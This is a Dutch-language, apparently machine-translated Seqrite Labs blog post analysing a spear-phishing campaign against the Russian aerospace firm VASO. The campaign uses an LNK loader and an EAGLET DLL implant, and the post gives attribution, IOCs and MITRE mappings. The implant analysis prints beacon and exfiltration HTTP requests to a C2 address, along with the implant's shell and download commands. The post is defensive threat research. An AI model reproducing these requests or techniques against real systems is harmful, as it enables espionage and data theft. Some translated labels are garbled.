• Producten en services
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Kleine bedrijven

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cyberbeveiliging & Data Privacy Bewustzijn
  • Oplossingen
    • BFSI
    • Educatie
    • Overheid
    • Gezondheidszorg
    • ITeS
    • Productie
  • Over ons
    • Over ons Seqrite
    • Leiderschap
    • Onderscheidingen en certificeringen
    • Newsroom
  • Partners
    • Partner Program
    • Partner zoeken
    • Word een Partner
  • Support
  • Informatiebronnen
    • Blogs
    • Whitepapers
    • Datasheets
    • Casestudies
    • Bedreigingsrapporten
    • Handleidingen
    • PoV
    • Begrip Data Privacy
    • Check uw risicoscore
    • DPDP-dialogen
    • Privacy-uur
Seqrite <font dir="auto" style="vertical-align: inherit;">Labs</font> Blog
Contact Onder aanval?
  • Producten en services
        • Cloud

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Kleine bedrijven

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cyberbeveiliging & Data Privacy Bewustzijn
  • Oplossingen
    • BFSI
    • Educatie
    • Overheid
    • Gezondheidszorg
    • ITeS
    • Productie
  • Over ons
    • Over ons Seqrite
    • Leiderschap
    • Onderscheidingen en certificeringen
    • Newsroom
  • Partners
    • Partner Program
    • Partner zoeken
    • Word een Partner
  • Support
  • Informatiebronnen
    • Blogs
    • Whitepapers
    • Datasheets
    • Casestudies
    • Bedreigingsrapporten
    • Handleidingen
    • PoV
    • Begrip Data Privacy
    • Check uw risicoscore
    • DPDP-dialogen
    • Privacy-uur
Home  /  Technisch  / Operatie CargoTalon: UNG0901 richt zich op de Russische lucht- en ruimtevaartsector met behulp van een EAGLET-implantaat.
Operatie CargoTalon: UNG0901 richt zich op de Russische lucht- en ruimtevaartsector met behulp van EAGLET-implantaat.
23 juli 2025

Operatie CargoTalon: UNG0901 richt zich op de Russische lucht- en ruimtevaartsector met behulp van EAGLET-implantaat.

Geschreven door Subhajeet Singha
Subhajeet Singha
Technisch

Inhoud

  • Introductie
  • Eerste bevindingen
  • Infectieketen.
  • Technische Analyse
    • Fase 0 – Kwaadaardig e-mailbestand.
    • Fase 1 – Kwaadaardig LNK-bestand.
    • Fase 2 – Het decoy-bestand bekijken.
    • Fase 3 – Kwaadaardig EAGLET-implantaat.
  • Jacht en infrastructuur.
    • Infrastructurele details.
    • Vergelijkbare campagnes.
  • Attribution
  • Conclusie
  • SEQRITE Bescherming.
  • IOCs
  • MITRE ATT&CK.

Introductie

SEQRITE Labs APT-Team heeft onlangs een campagne ontdekt die zich richt op de Russische lucht- en ruimtevaartindustrie. De campagne is gericht op medewerkers van Voronezj Aircraft Production Association (VASO), een van de grootste vliegtuigfabrikanten in Rusland, door gebruik te maken van TTN-documenten (товарно-транспортная накладная), die cruciaal zijn voor de Russische logistieke operaties. Het gehele malware-ecosysteem dat bij deze campagne betrokken is, is gebaseerd op het gebruik van een kwaadaardig LNK-bestand (EAGLET DLL-implantaat), dat vervolgens kwaadaardige commando's uitvoert en gegevens steelt.

In deze blog bespreken we de technische details van de campagne die we tijdens onze analyse tegenkwamen. We bekijken de verschillende fasen van deze campagne, beginnend met een diepgaande analyse van de initiële infectieketen tot en met het implantaat dat in deze campagne wordt gebruikt, en eindigend met een afsluitend overzicht van de campagne.

Eerste bevindingen

Onlangs, op 27 juni, ontdekte ons team tijdens het opsporen van kwaadaardige spear-phishing-bijlagen een kwaadaardig e-mailbestand dat opdook op bronnen zoals VirusTotal . Bij verder onderzoek vonden we ook een kwaadaardig LNK-bestand, dat verantwoordelijk was voor de uitvoering van de kwaadaardige DLL-bijlage waarvan het bestandstype zich voordeed als een ZIP-bijlage.

Bij het bekijken van de e-mail vonden we het bestand Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip, wat zich vertaalt naar Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip. Het is in feite een DLL-bestand. Na verder zoeken vonden we een ander bestand, een snelkoppeling [LNK], met dezelfde naam. Vervolgens besloten we de werking van deze bestanden te onderzoeken.

Infectieketen

 

Technische Analyse

We zullen de analyse van deze campagne opsplitsen in drie verschillende delen. We beginnen met het onderzoeken van het schadelijke EML-bestand, gevolgd door de bijlage Ie, het schadelijke DLL-bestand en het LNK-bestand.

Fase 0 – Kwaadaardig e-mailbestand.

Nou, in eerste instantie vonden we een kwaadaardig e-mailbestand met de naam backup-message-10.2.2.20_9045-800282.eml, geüpload vanuit de Russische Federatie. Na het bekijken van de details van het e-mailbestand.

We ontdekten dat de e-mail naar een medewerker van de Voronezh Aircraft Production Association (VASO) van het Transport and Logistics Centre was gestuurd met betrekking tot een leveringsbon.

Bij het bestuderen van de inhoud van de e-mail ontdekten we dat het bericht was opgesteld om nieuws te brengen over recente logistieke bewegingen, met een verwijzing naar een vrachtbrief ( Товарно-транспортная накладная №391-44 от 26.06.2025 ). De e-mail drong er ook bij de ontvanger op aan zich voor te bereiden op de levering van een bepaalde lading binnen 2-3 dagen. Omdat we al hadden vastgesteld dat de dader zich voordeed als een persoon, ontdekten we ook een kwaadaardige bijlage, vermomd als een ZIP-bestand. Na het downloaden bleek het een schadelijke DLL-implantaat te zijn.

Naast de kwaadaardige DLL-implantatie hebben we ook gezocht naar een kwaadaardig LNK-bestand met dezelfde naam. Wij denken dat dit bestand afkomstig is van een andere spearfishing-bijlage. Het bestand wordt gebruikt om deze DLL-implantatie uit te voeren, die we EAGLET hebben genoemd.

In het volgende gedeelte gaan we dieper in op het schadelijke LNK-bestand.

Fase 1 – Kwaadaardig LNK-bestand.

Toen we het LNK-bestand bekeken, ontdekten we dat het een specifieke reeks taken uitvoert die uiteindelijk het schadelijke DLL-bestand uitvoeren en een misleidende pop-up op het scherm weergeven. Dit gebeurt op de volgende manier.

In eerste instantie wordt het script op de achtergrond uitgevoerd met behulp van het binaire bestand powershell.exe, dat het gemaskeerde ZIP-bestand opsomt. Dit is het schadelijke EAGLET-implantaat. Als het schadelijke implantaat wordt gevonden, wordt het uitgevoerd via rundll32.exe LOLBIN. Als het bestand niet kan worden gevonden, wordt recursief gezocht naar het bestand onder %USERPROFILE%. Als het bestand op die locatie niet kan worden gevonden, wordt het uitgevoerd. Als het bestand op die locatie niet kan worden gevonden, wordt gezocht onder %TEMP%.

Zodra het DLL-implantaat is gevonden, wordt het uitgevoerd en extraheert het een lokaas-XLS-bestand dat in het implantaat is ingesloten. Dit gebeurt door het XLS-bestand van 59904 bytes te lezen, dat net na de eerste 296960 bytes is opgeslagen. Dit bestand wordt vervolgens naar de map %TEMP% geschreven met de naam ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. Dit is het doel van het schadelijke LNK-bestand. In de volgende sectie zullen we het lokaas-bestand nader bekijken.

Fase 2 - Het decoy-bestand bekijken.

In dit gedeelte gaan we kijken naar het XLS-decoybestand, dat is geëxtraheerd uit het DLL-implantaat.

In eerste instantie stelden we vast dat het genoemde .XLS-bestand gekoppeld is aan een gesanctioneerde Russische entiteit, Obltransterminal LLC (ООО “Облтранстерминал”), die voorkomt op de OFAC SDN-lijst (Specially Designated Nationals) van het Amerikaanse ministerie van Financiën. De organisatie is gesanctioneerd op grond van Executive Order 14024 vanwege haar betrokkenheid bij de Russische militair-logistieke infrastructuur.

Vervolgens zagen we dat het XLS-bestand details bevatte over gestructureerde velden voor het vastleggen van containernummer, type, leeggewicht, laadvermogen en zegelnummer, evenals voertuig- en platforminformatie. Het bevatte met name selectievakjes voor de containerstatus (geladen, leeg of in reparatie) en een schematisch gebied voor het markeren van fysieke schade aan de container.

Vervolgens zien we dat de nepcontainer een gedetailleerde lijst bevat met schadecodes voor containers die doorgaans worden gebruikt in Russische logistieke operaties . Deze codes hebben betrekking op een breed scala aan structurele en mechanische problemen die tijdens een containerinspectie kunnen worden vastgesteld. De lijst bevat specifieke termen zoals scheuren of perforaties (Трещина), vervormingen van boven- en onderbalken (Деформация верхних/нижних балок), corrosie (Сквозная коррозия) en de afwezigheid of beschadiging van vergrendelingsstangen, scharnieren, rubberen afdichtingen, platen en hoekfittingen. Elk schadetype is systematisch genummerd van 1 tot 24, conform de gestandaardiseerde inspectiedocumentatie.

In het algemeen is de lokvogel in principe bedoeld om een ​​officieel Russisch containerinspectiedocument te simuleren – meer specifiek een Equipment Interchange Report (EIR) – dat wordt gebruikt bij de overdracht van vrachtcontainers. Het bevat gestructureerde velden voor containerspecificaties, zegelnummers, gewicht en voertuiggegevens, samen met schematische diagrammen en een gestandaardiseerde lijst van 24 schadecodes die alles omvatten, van scheuren en vervormingen tot corrosie en ontbrekende onderdelen die verband houden met Obltransterminal LLC . In het volgende gedeelte zullen we de EAGLET-implantatie nader bekijken.

Fase 3 – Kwaadaardig EAGLET-implantaat.

In eerste instantie, toen we het implantaat zagen en het in een PE-analysetool laadden, konden we bevestigen dat het hier om een ​​PE-bestand ging, waarbij de lokaas in het overlay-gedeelte was opgeslagen, wat we eerder al zagen.

Vervolgens keken we naar de exports van deze kwaadaardige DLL, de EntryPoint, en helaas bevatte die niets interessants. Vervolgens keken we naar de DllEntryPoint, die ons naar de DllMain leidde, die wel interessante code bevatte met betrekking tot kwaadaardig gedrag.

De interessante eerste functie, die in principe informatie over de doelmachine opsomt.

Bij deze functie gaat de code verder met het creëren van een unieke GUID van het doelwit. Deze GUID wordt gebruikt om het slachtoffer te identificeren. Elke keer dat de implantatie wordt uitgevoerd, wordt een nieuwe GUID gegenereerd. Dit imiteert het gedrag van de sessie-ID, wat de operator of de bedreigende actor helpt duidelijkheid te krijgen over het doelwit.

 

Vervolgens worden de computernaam van de doelcomputer, de hostnaam en de DNS-domeinnaam van de doelcomputer opgesomd. Zodra deze is ontvangen, wordt een map met de naam MicrosoftApppStore aangemaakt onder de locatie ProgramData.

Vervolgens wordt met CreateThread een schadelijke thread aangemaakt, die verantwoordelijk is voor het verbinden met het command-and-control[C2] IP en nog veel meer.

Vervolgens kunnen we zien dat het implantaat bepaalde Windows-netwerk-API's gebruikt, zoals WinHttpOpen, om een ​​HTTP-sessie te starten. Deze sessie wordt gemaskeerd door een ongebruikelijke user-agent-string MicrosoftAppStore/2001.0, die vervolgens wordt gevolgd door een andere API, WinHtppConnect, die probeert verbinding te maken met de hardgecodeerde command-and-control[C2]-server, 185.225.17.104, via poort 80. Als dit mislukt, blijft het opnieuw proberen.

Als de implantaten verbinding maken met de C2, vormt dit een URL-pad dat wordt gebruikt om een ​​GET-verzoek naar de C2-infrastructuur te sturen. De volledige aanvraagtekst ziet er ongeveer zo uit:

GET /poll?id=<{willekeurig-aangemaakte-GUID}&hostname={hostname}&domein={domein} HTTP/1.1Host: 185.225.17.104

Na het verzenden van het verzoek probeert het implantaat het HTTP-antwoord van de C2-server te lezen, dat instructies kan bevatten om bepaalde acties uit te voeren.

Wat de functionaliteit betreft, ondersteunt het implantaat shell-access, wat de C2-operator of bedreigingsactor in principe een shell op de doelcomputer geeft, die vervolgens gebruikt kan worden om schadelijke activiteiten uit te voeren.

Een andere functie is de downloadfunctie in dit implantaat, die schadelijke content van de server downloadt of gewenste of interessante bestanden van de doelcomputer exfiltreert. Eén functie downloadt schadelijke content van de server en slaat deze op in de locatie C:\ProgramData\MicrosoftAppStore\. Omdat de C2 momenteel down is, konden de bestanden die gebruikt waren of zijn, niet worden gevonden tijdens de publicatie van dit onderzoek.

Later werd ook een andere functionaliteit die niet relevant was voor deze downloadfunctie duidelijk: het implantaat exfiltreert in feite bestanden van de doelcomputer. De aanvraagtekst ziet er ongeveer zo uit:

POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

De kenmerken zijn dus als volgt.

Kenmerk Trigger-trefwoord Gedrag Doel
Opdracht Uitvoering cmd: Voert een shell-opdracht uit die is ontvangen van de C2-server en legt de uitvoer vast Uitvoering van externe code
Bestand downloaden downloaden: Downloadt een bestand van een externe locatie en slaat het op in C:\ProgramData\MicrosoftAppStore\ Payload-staging
exfiltratie (automatisch) Stuurt het resultaat van de uitvoering van de opdracht of de downloadstatus terug naar de C2-server via HTTP POST Gegevens exfiltratie

Daarmee is de technische analyse van het EAGLET-implantaat samengevat. Hierna kijken we naar het andere deel, dat zich richt op infrastructurele kennis en het opzetten van vergelijkbare jachtcampagnes.

Jacht en infrastructuur

Infrastructurele details

In deze sectie bekijken we de infrastructuurgerelateerde artefacten. Allereerst de C2, waarvan we 185[.]225[.]17[.]104 vonden, die verantwoordelijk is voor de verbinding met het EAGLET-implantaat. De C2-server bevindt zich in Roemenië onder ASN 39798 van MivoCloud SRL.

Na onderzoek bleek dat veel passieve DNS-records verwezen naar historische infrastructuur die eerder in verband werd gebracht met hetzelfde dreigingscluster als TA505, zoals onderzocht door onderzoekers van BinaryDefense . De DNS-records suggereren dat er in deze campagne gebruik is gemaakt van vergelijkbare of hergebruikte infrastructuur. Naast de infrastructurele correlaties met TA505, die zich beperken tot het gebruik van hergebruikte domeinen, zagen we ook dat sommige andere verdachte domeinen DNS-records hadden die naar dezelfde infrastructuur verwezen. Met grote zekerheid kunnen we stellen dat de huidige campagne, afgezien van de bovengenoemde informatie, geen verband houdt met TA505.

Vergelijkbaar met de campagne die zich richt op de lucht- en ruimtevaartsector, hebben we ook een andere campagne gevonden die zich richt op de Russische militaire sector via documenten met een rekruteringsthema. We ontdekten in die campagne dat de dreigingsactor een EAGLET-implantaat gebruikte dat verbinding maakt met de C2, Ie, 188[.]127[.]254[.]44, die zich in het Russisch bevindt onder ASN 56694 en eigendom is van de organisatie LLC Smart Ape.

Vergelijkbare campagnes

Campagne 1 – Militaire thema-targeting

In eerste instantie zagen we de URL-tekst en veel andere gedragskenmerken van het implantaat. Dit leidde ons naar een andere reeks campagnes met exact hetzelfde implantaat, die werden gebruikt om Russische militaire rekrutering te targeten.

Deze lokvogel is afkomstig van een EAGLET-implantaat met de naam Договор_РН83_изменения.zip, wat zich vertaalt naar Contract_RN83_Changes, en is gericht op personen en entiteiten die betrokken zijn bij de rekrutering van het Russische leger. Zoals we kunnen zien, benadrukt de lokvogel meerdere voordelen van dienstbaarheid, waaronder een hypotheek op een huis, een pensioen en nog veel meer voordelen.

Campagne 2 – EAGLET-implantaat zonder ingebed lokaas

In de vorige campagnes zagen we dat de bedreigingsentiteit af en toe een schadelijke LNK liet vallen, die het DLL-implantaat uitvoert en de lokaas uit het overlay-gedeelte van het implantaat extraheert, maar in deze campagne zagen we ook een implantaat zonder lokaas erin.

Daarnaast zagen we ook meerdere overlappingen tussen deze campagnes, die vergelijkbare doelen nastreefden en dezelfde implantatiecode gebruikten als de dreigingsentiteit Head Mare, die zich richtte op Russischsprekende personen en die aanvankelijk door onderzoekers van Kaspersky was ontdekt.

Attribution

Attributie is een essentiële maatstaf bij het beschrijven van een bedreigende actor of groep. Het omvat het analyseren en correleren van verschillende domeinen, waaronder tactieken, technieken en procedures (TTP's), overeenkomsten en hergebruik van code, de motivatie van de bedreigende actor en soms operationele fouten zoals het gebruik van vergelijkbare bestands- of afleidingsnomenclatuur.

Tijdens onze voortdurende monitoring van UNG0901 ontdekten we opmerkelijke overeenkomsten en overlappingen met de dreigingsgroep Head Mare, zoals geïdentificeerd door onderzoekers van Kaspersky. Laten we enkele van de belangrijkste overlappingen tussen Head Mare en UNG0901 bekijken.

Belangrijke overlappingen tussen UNG0901 en Hoofdmerrie

  1. Gereedschapsarsenaal:

Onderzoekers van Kaspersky merkten op dat Head Mare vaak een Golang-gebaseerde backdoor gebruikt, bekend als PhantomDL, die vaak wordt ingepakt met behulp van softwarepackers zoals UPX, die zeer eenvoudige maar functionele functies hebben zoals shell, download, upload en exit. Ook UNG0901 heeft een EAGLET-implantaat geïmplementeerd, dat vergelijkbaar gedrag vertoont en bijna dezelfde functies heeft, zoals shell, download, upload, enz., en dat is geprogrammeerd in C++.

  1. Techniek voor het benoemen van bestanden:

Onderzoekers van Kaspersky merkten op dat de PhantomDL-malware vaak wordt verspreid via spearphishing met bestandsnamen zoals Contract_kh02_523. Ook in de campagnes die we zagen met UNG0901, waren er bestandsnamen met een vergelijkbare stijl, zoals Contract_RN83_Changes. En er waren nog veel meer bestandsnaamgevingsschema's die we vergelijkbaar vonden.

  1. Motivatie:

Head Mare heeft belangrijke entiteiten die verband houden met Rusland op het oog, terwijl UNG0901 ook meerdere belangrijke entiteiten die verband houden met Rusland op het oog had.

Daarnaast zijn er nog veel meer en sterke overeenkomsten die de connectie tussen deze twee dreigingsentiteiten versterken. Daarom schrijven we UNG0901 dezelfde middelen en veel andere overeenkomsten toe aan Head Mare, dat zich richt op Russische overheids- en niet-overheidsentiteiten.

Conclusie

UNG0901, oftewel Unknown-Group-901, demonstreert een gerichte cyberoperatie tegen de Russische lucht- en ruimtevaart- en defensiesector met behulp van spearphishing-e-mails en een speciaal EAGLET DLL-implantaat voor spionage en data-exfiltratie. UNG0901 overlapt ook met Head Mare, dat meerdere overeenkomsten vertoont, zoals de nomenclatuur van de lokaas en nog veel meer.

SEQRITE Bescherming

  • AgentCiR
  • trojan.49644.SL

IOCs

Bestandstype FileName SHA-256
LNK Договор_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
DLL Договор_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
NB b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
Договор_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
Lokvogel [XLS/ PDF] temp.pdf 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
sample_extracted.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
sample_extracted.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
sample_extracted.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
sample_extracted.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
sample_extracted.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
E-mailbestand backup-bericht-10.2.2.20_9045-800282.eml ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

MITRE ATT & CK

Tactiek Techniek ID Details
Eerste toegang Spearphishing-bijlage T1566.001 Kwaadaardig .EML-bestand verzonden naar VASO-medewerker, dat zich voordoet als een logistiek centrum met TTN-documentlokmiddel.
Uitvoering Uitvoering van binaire proxy van systeem: Rundll32 T1218.011 DLL-implantatie uitgevoerd via vertrouwde rundll32.exe LOLBIN, aangeroepen vanuit het .LNK-bestand.
PowerShell T1059.001 Wordt gebruikt voor het lokaliseren en starten van het DLL-implantaat vanuit meerdere fallback-directory's.
Volharding Implantaat in ZIP-vermomde DLL [Custom] DLL vermomt zich als .ZIP-bestand — persistentie wordt geïmpliceerd via door de operator aangestuurde uitvoeringen.
verdediging ontduiking Het vermommen T1036 Implantaat vermomd als ZIP, nep-XLS gebruikt om goedgekeurde logistieke documenten te simuleren.
De reis van mijn leven Ontdekking van systeeminformatie T1082 Verzamelt hostnaam, computernaam en domein; creëert een slachtoffer-GUID om het doelwit te identificeren.
Domeinvertrouwen ontdekken T1482 Somt het DNS-domein van het slachtoffer op voor netwerkprofilering.
Commando en controle Toepassingslaagprotocol: HTTP T1071.001 Communiceert met C2 via HTTP; gebruikt MicrosoftAppStore/2001.0 User-Agent.
Collectie Gegevens van lokaal systeem T1005 Exfiltreert systeemdetails en bestandsinhoud op basis van de commando's van de bedreiging.
exfiltratie Exfiltratie via C2-kanaal T1041 POST-verzoeken naar het /result-eindpunt op C2 met gecodeerde opdrachtresultaten of geëxfiltreerde gegevens.
Impact Gegevens exfiltratie T1537 Gerichte datadiefstal uit de Russische lucht- en ruimtevaartsector.

Auteurs:

Subhajeet Singha

Sathwik Ram Prakki

 Vorig berichtAndroid Cryptojacker vermomd als bank-app maakt misbruik van apparaatlokalisatie
Volgend bericht  Waarom Threat IntelLigence is de ontbrekende schakel in uw cyberbeveiliging...
Subhajeet Singha

Over Subhajeet Singha

Subhajeet werkt als beveiligingsonderzoeker bij Security Labs van Quick Heal. Zijn aandachtsgebieden zijn: threat intelonderzoek, inclusief reverse engineering, om...

Artikelen door Subhajeet Singha »

gerelateerde berichten

  • MacSync: De ongrijpbare macOS-dief die ClickFix-valstrikken misbruikt

    MacSync: De ongrijpbare macOS-dief die ClickFix-valstrikken misbruikt

    8 september 2026
  • Operatie QUICSILVER: China-connectie-actor richt zich op Myanmarese diplomaten via VHD-geleverde Go Backdoor-aanval

    Operatie QUICSILVER: China-connectie-actor richt zich op Myanmarese diplomaten via VHD-geleverde Go Backdoor-aanval

    August 17, 2026
  • Misbruik van vertrouwde bedrijfsworkflows: een meerfasige campagne van een zogenaamde 'phantom stealer'.

    July 22, 2026
Aanbevolen auteurs
  • Seqrite
    Seqrite

    Seqrite is een toonaangevende leverancier van cybersecurityoplossingen voor bedrijven. Met een focus op...

    Lees meer artikelen van Seqrite
  • Bineesh P
    Bineesh P

    Ik ben een gepassioneerd cybersecurity-liefhebber en een toegewijd schrijver. Met een talent...

    Lees meer artikelen van Bineesh P.
  • Jyoti Karlekar
    Jyoti Karlekar

    Ik ben een fervent schrijver die graag content schrijft over opkomende technologieën en...

    Lees meer artikelen van Jyoti Karlekar
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is de gezamenlijke algemeen directeur van Quick Heal Technologies...

    Lees meer artikelen van Sanjay Katkar
onderwerpen
geneigd (25) Cyber ​​aanval (36) cyberaanvallen (58) Cyber ​​aanval (16) cyberaanvallen (15) Cybersecurity (342) internetveiligheid (34) Cyberdreiging (33) cyber bedreigingen (51) datalek (56) datalekken (29) Data Loss (28) Data verlies voorkomen (34) data privacy (17) gegevensbescherming (35) gegevensbeveiliging (19) DLP (50) DPDP (14) DPDPA (17) Encryptie (16) eindpuntbeveiliging (113) Enterprise-beveiliging (20) Exploiteren (13) GDPR (14) malware (76) malware-analyse (14) malware-aanval (23) MDM (27) Microsoft (15) MITRE ATT & CK (14) Netwerk veiligheid (26) Phishing (30) Ransomware (69) ransomware-aanval (31) ransomware-aanvallen (31) ransomware-bescherming (17) Seqrite (41) Seqrite Encryptie (27) Seqrite EPS (33) Seqrite Services (16) bedreigingsdetectie (14) Threat Intelligentie (23) UTM (34) Kwetsbaarheid (16) nul vertrouwen (13)
Seqrite <font dir="auto" style="vertical-align: inherit;">Labs</font>

Toonaangevende leverancier van IT-beveiligingsoplossingen voor ondernemingen, die de beveiliging van eindpunten, gegevens en netwerken vereenvoudigt met toonaangevende oplossingen voor het voorkomen, detecteren en aanpakken van bedreigingen wereldwijd.

Lees meer over Seqrite

Volg ons:

Ontvang onze nieuwsbrief

Blijf op de hoogte van de laatste trends en inzichten op het gebied van cyberbeveiliging.

het laden
Producten en services
  • Cloud
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Op Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Microbedrijf
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cyberbeveiliging & Data Privacy Bewustzijn
Informatiebronnen
  • Blogs
  • Whitepapers
  • Datasheets
  • Bedreigingsrapporten
  • Handleidingen
  • PoV
  • Begrip Data Privacy
  • DPDP-dialogen
  • Beleid en naleving
  • EULA
  • GoDeep.AI
  • SIA
  • Privacy-uur
Contact
  • Geregistreerde kantoren
  • Laten we het over cyberbeveiliging hebben
Support
  • Technische ondersteuning
  • Software downloaden
  • Offline-updater
  • firmware Upgrades
  • Upgrades
  • productdocumentatie
Over Ons
  • Over ons Seqrite
  • Leiderschap
  • Onderscheidingen en erkenning
  • Newsroom
Partners
  • Partner Program
  • Partner zoeken
  • Word een Partner
  • Seqrite Certificering

© 2026 Quick Heal Technologies Ltd.

Sitemap privacybeleid Wettelijke vermeldingen Cookiebeleid Gebruiksvoorwaarden